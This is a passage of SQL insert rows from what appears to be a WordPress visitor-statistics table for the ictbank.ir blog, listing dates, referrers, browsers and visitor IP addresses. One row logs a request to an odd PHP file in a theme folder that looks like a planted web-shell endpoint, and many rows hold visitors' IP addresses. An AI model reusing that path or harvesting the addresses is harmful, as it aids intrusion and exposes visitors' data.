(24607,'2022-09-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24608,'2022-09-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(24609,'2022-09-29','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(24610,'2022-09-29','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.42','000',0,2,0),
(24611,'2022-09-29','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','178.62.195.92','000',0,1,0),
(24612,'2022-09-29','http://82.102.9.14/blog','Firefox','Linux','73.0','desktop','Unknown','','159.203.120.33','000',0,2,0),
(24613,'2022-09-29','http://ictbank.ir/blog/','Edge','Windows','90.0.818.49','desktop','Unknown','','5.58.187.240','000',0,1,0),
(24614,'2022-09-29','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,2,0),
(24615,'2022-09-30','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.53','000',0,2,0),
(24616,'2022-09-30','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,3,0),
(24617,'2022-09-30','http://ictbank.ir/blog','Safari','OS X','5.1','desktop','Macintosh','','208.80.194.121','000',0,4,0),
(24618,'2022-09-30','http://ictbank.ir/blog','Chrome','Windows','100.0.4758.11','desktop','Unknown','','5.188.62.174','000',0,1,0),
(24619,'2022-09-30','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(24620,'2022-09-30','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.42','000',0,2,0),
(24621,'2022-09-30','https://www.google.com/','Chrome','Windows','105.0.0.0','desktop','Unknown','','36.71.142.239','000',0,1,0),
(24622,'2022-09-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,2,0),
(24623,'2022-09-30','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24624,'2022-09-30','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','176.58.97.87','000',0,2,0),
(24625,'2022-09-30','http://ictbank.ir/blog','Chrome','Windows','100.0.4896.75','desktop','Unknown','','163.116.136.254','000',0,1,0),
(24626,'2022-09-30','http://ictbank.ir/blog','Chrome','OS X','39.0.2171.95','desktop','Macintosh','','88.99.186.89','000',0,1,0),
(24627,'2022-09-30','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.165.4.61','000',0,1,0),
(24628,'2022-09-30','http://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','192.36.70.176','000',0,1,0),
(24629,'2022-09-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','198.211.125.219','000',0,1,0),
(24630,'2022-09-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,2,0),
(24631,'2022-09-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(24632,'2022-09-30','http://ictbank.ir/blog','Chrome','OS X','39.0.2171.95','desktop','Macintosh','','130.162.36.142','000',0,4,0),
(24633,'2022-10-01','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,4,0),
(24634,'2022-10-01','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.41','000',0,15,0),
(24635,'2022-10-01','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.56','000',0,2,0),
(24636,'2022-10-01','http://ictbank.ir/blog','Opera','Windows','8.01','desktop','Unknown','','208.80.194.122','000',0,2,0),
(24637,'2022-10-01','http://ictbank.ir/blog','Chrome','Linux','103.0.5060.134','desktop','Unknown','','35.165.215.140','000',0,2,0),
(24638,'2022-10-01','http://ictbank.ir/','Opera','Linux','89.0.4447.51','desktop','Unknown','','84.247.59.186','000',0,1,0),
(24639,'2022-10-01','http://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,1,0),
(24640,'2022-10-01','http://ictbank.ir/blog','Firefox','OS X','5.0.1','desktop','Macintosh','','208.80.194.121','000',0,3,0),
(24641,'2022-10-01','http://ictbank.ir/blog','Chrome','Windows','14.0.835.187','desktop','Unknown','','208.80.194.126','000',0,2,0),
(24642,'2022-10-01','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Blade A520','','61.147.15.67','000',0,6,0),
(24643,'2022-10-01','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','66.240.219.146','000',0,2,0),
(24644,'2022-10-01','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.23','000',0,30,0),
(24645,'2022-10-01','http://ictbank.ir/blog','Firefox','Windows','79.0','desktop','Unknown','','88.99.248.98','000',0,3,0),
(24646,'2022-10-01','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.37','000',0,20,0),
(24647,'2022-10-01','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.90.224.117','000',0,1,0),
(24648,'2022-10-01','http://wikisonnati.com/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','95.53.8.105','000',0,2,0),
(24649,'2022-10-01','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24650,'2022-10-01','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','176.58.97.180','000',0,2,0),
(24651,'2022-10-01','http://82.102.9.14/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.65','000',0,1,0),
(24652,'2022-10-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','198.211.125.219','000',0,1,0),
(24653,'2022-10-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,2,0),
(24654,'2022-10-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(24655,'2022-10-01','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.32','000',0,5,0),
(24656,'2022-10-01','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','175.152.28.39','000',0,1,0),
(24657,'2022-10-01','http://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Unknown','','152.136.165.44','000',0,1,0),
(24658,'2022-10-02','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.45','000',0,2,0),
(24659,'2022-10-02','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,1,0),
(24660,'2022-10-02','http://ictbank.ir/blog','Firefox','Windows','55.0','desktop','Unknown','','51.11.247.43','000',0,2,0),
(24661,'2022-10-02','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.194','000',0,2,0),
(24662,'2022-10-02','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(24663,'2022-10-02','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','185.181.61.24','000',0,1,0),
(24664,'2022-10-02','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','165.232.133.124','000',0,3,0),
(24665,'2022-10-02','http://ictbank.ir/blog','Chrome','Windows','11.0.696.68','desktop','Unknown','','208.80.194.126','000',0,7,0),
(24666,'2022-10-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(24667,'2022-10-02','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.41','000',0,2,0),
(24668,'2022-10-02','https://www.bing.com/','Edge','Windows','105.0.1343.53','desktop','Unknown','','79.35.195.209','000',0,2,0),
(24669,'2022-10-02','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','83.10.106.87','000',0,2,0),
(24670,'2022-10-02','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','95.53.8.105','000',0,3,0),
(24671,'2022-10-02','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24672,'2022-10-02','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.210.28.107','000',0,1,0),
(24673,'2022-10-02','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','173.212.224.141','000',0,1,0),
(24674,'2022-10-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.184.197','000',0,1,0),
(24675,'2022-10-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24676,'2022-10-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,1,0),
(24677,'2022-10-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24678,'2022-10-02','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','45.33.96.205','000',0,2,0),
(24679,'2022-10-02','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,2,0),
(24680,'2022-10-02','http://ictbank.ir/blog','Chrome','Android','81.0.4044.138','mobile:smart','Nexus 5','','121.4.79.217','000',0,1,0),
(24681,'2022-10-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(24682,'2022-10-02','http://ictbank.ir/blog','Firefox','Windows','4.0.1','desktop','Unknown','','208.80.194.121','000',0,1,0),
(24683,'2022-10-03','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.27','000',0,3,0),
(24684,'2022-10-03','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(24685,'2022-10-03','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','178.128.230.145','000',0,2,0),
(24686,'2022-10-03','http://82.102.9.14/blog','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.116','000',0,1,0),
(24687,'2022-10-03','http://82.102.9.14/blog/','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.229','000',0,1,0),
(24688,'2022-10-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,2,0),
(24689,'2022-10-03','http://ictbank.ir/blog','Chrome','Windows','29.0.1547.62','desktop','Unknown','','3.68.50.38','000',0,1,0),
(24690,'2022-10-03','http://ictbank.ir/blog','Chrome','Windows','10.0.648.133','desktop','Unknown','','208.80.194.122','000',0,3,0),
(24691,'2022-10-03','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','185.39.144.147','000',0,2,0),
(24692,'2022-10-03','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(24693,'2022-10-03','http://ictbank.ir/blog','Firefox','Windows','65.0','desktop','Unknown','','184.94.240.88','000',0,2,0),
(24694,'2022-10-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','45.61.186.136','000',0,2,0),
(24695,'2022-10-03','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24696,'2022-10-03','http://ictbank.ir/blog','Chrome','Windows','103.0.5060.66','desktop','Unknown','','199.249.230.22','000',0,1,0),
(24697,'2022-10-03','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.185.189.204','000',0,1,0),
(24698,'2022-10-03','http://ictbank.ir/blog','Chrome','Windows','16.0.912.63','desktop','Unknown','','208.80.194.126','000',0,3,0),
(24699,'2022-10-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.32.144.195','000',0,1,0),
(24700,'2022-10-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','108.61.123.152','000',0,1,0),
(24701,'2022-10-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(24702,'2022-10-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24703,'2022-10-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.15','000',0,2,0),
(24704,'2022-10-04','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,3,0),
(24705,'2022-10-04','http://ictbank.ir/blog','Chrome','Windows','9.0.597.94','desktop','Unknown','','208.80.194.126','000',0,4,0),
(24706,'2022-10-04','http://ictbank.ir/','Firefox','Ubuntu','65.0','desktop','Unknown','','80.234.34.116','000',0,1,0),
(24707,'2022-10-04','http://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','196.19.121.186','000',0,1,0),
(24708,'2022-10-04','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(24709,'2022-10-04','http://82.102.9.14/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.181','000',0,1,0),
(24710,'2022-10-04','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(24711,'2022-10-04','http://ictbank.ir/blog','Firefox','Windows','53.0','desktop','Unknown','','184.94.240.88','000',0,2,0),
(24712,'2022-10-04','http://ictbank.ir/','Chrome','Linux','103.0.0.0','desktop','Unknown','','37.139.53.20','000',0,2,0),
(24713,'2022-10-04','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','49.49.197.166','000',0,1,0),
(24714,'2022-10-04','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(24715,'2022-10-04','http://ictbank.ir/blog','Chrome','Windows','101.0.4951.67','desktop','Unknown','','5.188.62.174','000',0,2,0),
(24716,'2022-10-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.209','000',0,1,0),
(24717,'2022-10-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.211.0','000',0,1,0),
(24718,'2022-10-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,2,0),
(24719,'2022-10-04','http://ictbank.ir/blog','Firefox','Windows','64.0','desktop','Unknown','','155.94.203.142','000',0,1,0),
(24720,'2022-10-04','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','23.100.232.233','000',0,2,0),
(24721,'2022-10-04','http://82.102.9.14/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','185.180.143.147','000',0,2,0),
(24722,'2022-10-04','http://ictbank.ir/blog','Chrome','OS X','106.0.5249.91','desktop','Macintosh','','37.139.53.22','000',0,3,0),
(24723,'2022-10-04','http://ictbank.ir/blog','Chrome','Windows','94.0.4606.54','desktop','Unknown','','185.119.81.106','000',0,2,0),
(24724,'2022-10-04','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.83','000',0,1,0),
(24725,'2022-10-05','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','90.0.4430.93','desktop','Unknown','','37.139.53.22','000',0,8,0),
(24726,'2022-10-05','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','208.80.194.121','000',0,2,0),
(24727,'2022-10-05','https://duckduckgo.com/','Chrome','Linux','106.0.0.0','desktop','Unknown','','103.120.174.219','000',0,1,0),
(24728,'2022-10-05','https://www.bing.com','Chrome','Windows','27.0.1453.93','desktop','Unknown','','159.203.108.168','000',0,3,0),
(24729,'2022-10-05','http://82.102.9.14/blog','Firefox','Linux','73.0','desktop','Unknown','','159.203.83.188','000',0,2,0),
(24730,'2022-10-05','http://ictbank.ir/blog','Chrome','Linux','5.0.375.53','desktop','Unknown','','208.80.194.126','000',0,5,0),
(24731,'2022-10-05','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(24732,'2022-10-05','http://www.design-arena.ir:80/blog','Edge','Windows','12','desktop','Unknown','','2.57.122.25','000',0,7,0),
(24733,'2022-10-05','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24734,'2022-10-05','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(24735,'2022-10-05','http://ictbank.ir/blog','Chrome','Windows','10.0.649.0','desktop','Unknown','','185.119.81.108','000',0,4,0),
(24736,'2022-10-05','http://ictbank.ir/blog','Firefox','Windows','1.5.0.9','desktop','Unknown','','37.230.81.9','000',0,1,0),
(24737,'2022-10-05','http://ictbank.ir/blog','Chrome','Windows','54.0.2840.99','desktop','Unknown','','185.119.81.106','000',0,4,0),
(24738,'2022-10-05','https://www.bing.com/','Edge','Windows','106.0.1370.34','desktop','Unknown','','90.164.108.232','000',0,1,0),
(24739,'2022-10-05','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.92.107.36','000',0,1,0),
(24740,'2022-10-05','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.42','000',0,2,0),
(24741,'2022-10-05','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,3,0),
(24742,'2022-10-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(24743,'2022-10-05','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(24744,'2022-10-05','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(24745,'2022-10-05','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.34.187','000',0,1,0),
(24746,'2022-10-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.6.75','000',0,1,0),
(24747,'2022-10-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24748,'2022-10-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(24749,'2022-10-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(24750,'2022-10-05','http://ictbank.ir/blog','Chrome','Windows','99.0.4844.82','desktop','Unknown','','185.119.81.107','000',0,2,0),
(24751,'2022-10-06','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(24752,'2022-10-06','http://ictbank.ir/blog','Firefox','Windows','3.6.13','desktop','Unknown','','208.80.194.121','000',0,6,0),
(24753,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','41.0.2272.76','desktop','Unknown','','185.119.81.108','000',0,4,0),
(24754,'2022-10-06','http://ictbank.ir/blog','Firefox','Windows','3.6.7','desktop','Unknown','','208.80.194.122','000',0,3,0),
(24755,'2022-10-06','http://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,2,0),
(24756,'2022-10-06','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,7,0),
(24757,'2022-10-06','http://ictbank.ir/blog','Firefox','Windows','1.5.0.9','desktop','Unknown','','37.230.81.9','000',0,1,0),
(24758,'2022-10-06','http://ictbank.ir/blog','Opera','Windows','8.01','desktop','Unknown','','208.80.194.126','000',0,1,0),
(24759,'2022-10-06','http://ictbank.ir/blog','Chrome','Linux','103.0.5060.134','desktop','Unknown','','44.227.127.2','000',0,1,0),
(24760,'2022-10-06','http://ictbank.ir','Safari','OS X','15.5','desktop','Macintosh','','107.178.231.238','000',0,2,0),
(24761,'2022-10-06','http://ictbank.ir/blog/impdp-errors-ora-02374-ora-12899/','Internet Explorer','Windows','10.0','desktop','Unknown','','103.251.167.10','000',0,1,0),
(24762,'2022-10-06','http://ictbank.ir/blog','Edge','Windows','96.0.1054.43','desktop','Unknown','','3.232.207.53','000',0,1,0),
(24763,'2022-10-06','http://ictbank.ir','Chrome','OS X','101.0.4951.64','desktop','Macintosh','','107.178.232.248','000',0,2,0),
(24764,'2022-10-06','http://ictbank.ir/blog','Edge','Windows','96.0.1054.43','desktop','Unknown','','54.159.0.58','000',0,2,0),
(24765,'2022-10-06','http://ictbank.ir/blog','Edge','Windows','96.0.1054.43','desktop','Unknown','','18.234.52.10','000',0,1,0),
(24766,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','98.0.4758.102','desktop','Unknown','','194.154.78.238','000',0,1,0),
(24767,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','98.0.4758.102','desktop','Unknown','','2.57.169.4','000',0,1,0),
(24768,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','137.184.143.123','000',0,2,0),
(24769,'2022-10-06','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(24770,'2022-10-06','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','70.42.131.106','000',0,3,0),
(24771,'2022-10-06','http://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','95.25.71.106','000',0,1,0),
(24772,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.89','desktop','Unknown','','185.65.205.18','000',0,1,0),
(24773,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','64.124.51.154','000',0,1,0),
(24774,'2022-10-06','http://ictbank.ir/blog','Chromium','Ubuntu','68.0.3440.106','desktop','Unknown','','121.46.142.244','000',0,1,0),
(24775,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','192.30.83.91','000',0,2,0),
(24776,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','185.181.115.132','000',0,2,0),
(24777,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','185.181.115.133','000',0,2,0),
(24778,'2022-10-06','http://ictbank.ir/blog','Edge','Windows','12','desktop','Unknown','','192.30.83.191','000',0,1,0),
(24779,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','204.101.161.19','000',0,2,0),
(24780,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','56.0.2924.87','desktop','Unknown','','31.154.162.118','000',0,2,0),
(24781,'2022-10-06','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','172.105.189.111','000',0,2,0),
(24782,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','104.0.0.0','desktop','Unknown','','216.19.200.41','000',0,1,0),
(24783,'2022-10-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','193.226.177.45','000',0,4,0),
(24784,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','36.0.1985.67','desktop','Unknown','','64.124.27.90','000',0,1,0),
(24785,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.61','desktop','Unknown','','205.169.39.197','000',0,1,0),
(24786,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.201.48.42','000',0,1,0),
(24787,'2022-10-06','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.251.102.74','000',0,2,0),
(24788,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','80.0.3987.132','desktop','Unknown','','65.154.226.100','000',0,1,0),
(24789,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','77.0.3865.75','desktop','Unknown','','52.17.54.30','000',0,1,0),
(24790,'2022-10-06','http://ictbank.ir/blog','Firefox','Windows','57.0','desktop','Unknown','','35.90.52.181','000',0,1,0),
(24791,'2022-10-06','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','165.22.247.73','000',0,3,0),
(24792,'2022-10-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.14.171','000',0,1,0),
(24793,'2022-10-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','108.61.123.152','000',0,1,0),
(24794,'2022-10-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(24795,'2022-10-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24796,'2022-10-06','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.9','000',0,4,0),
(24797,'2022-10-06','http://ictbank.ir/blog','Chrome','OS X','80.0.3987.149','desktop','Macintosh','','35.161.55.221','000',0,1,0),
(24798,'2022-10-06','http://ictbank.ir/blog/impdp-errors-ora-02374-ora-12899/','Android Browser','Android','Unknown','mobile:smart','Galaxy Note 3','','206.189.247.132','000',0,1,0),
(24799,'2022-10-06','http://ictbank.ir/blog/impdp-errors-ora-02374-ora-12899/','Chrome','Windows','77.0.3865.120','desktop','Unknown','','68.183.245.101','000',0,1,0),
(24800,'2022-10-06','http://ictbank.ir/blog/impdp-errors-ora-02374-ora-12899/','Firefox','Windows','104.0','desktop','Unknown','','5.62.62.169','000',0,1,0),
(24801,'2022-10-06','http://ictbank.ir/blog/impdp-errors-ora-02374-ora-12899/','Android Browser','Android','Unknown','mobile:smart','Droid','','164.90.255.66','000',0,1,0),
(24802,'2022-10-07','http://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','35.161.55.221','000',0,2,0),
(24803,'2022-10-07','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,3,0),
(24804,'2022-10-07','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(24805,'2022-10-07','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24806,'2022-10-07','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(24807,'2022-10-07','http://ictbank.ir/blog','Chrome','Windows','60.0.3112.101','desktop','Unknown','','185.119.81.106','000',0,6,0),
(24808,'2022-10-07','http://82.102.9.14/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.122','000',0,1,0),
(24809,'2022-10-07','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.251.102.74','000',0,4,0),
(24810,'2022-10-07','http://ictbank.ir/blog','Chrome','Windows','93.0.4577.82','desktop','Unknown','','185.119.81.108','000',0,4,0),
(24811,'2022-10-07','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,5,0),
(24812,'2022-10-07','http://ictbank.ir/blog','Chrome','Windows','12.0.742.91','desktop','Unknown','','208.80.194.126','000',0,2,0),
(24813,'2022-10-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','138.201.129.110','000',0,7,0),
(24814,'2022-10-07','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.149.58','000',0,2,0),
(24815,'2022-10-07','https://www.bing.com','Chrome','OpenBSD','36.0.1985.125','desktop','Unknown','','165.232.130.240','000',0,1,0),
(24816,'2022-10-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(24817,'2022-10-07','http://82.102.9.14/','Chrome','OS X','17.0.963.56','desktop','Macintosh','','107.150.104.174','000',0,3,0),
(24818,'2022-10-07','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.165.242.41','000',0,1,0),
(24819,'2022-10-07','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.157','desktop','Unknown','','51.254.199.11','000',0,1,0),
(24820,'2022-10-07','http://82.102.9.14:80/blog','Firefox','Windows','83.0','desktop','Unknown','','129.213.93.228','000',0,4,0),
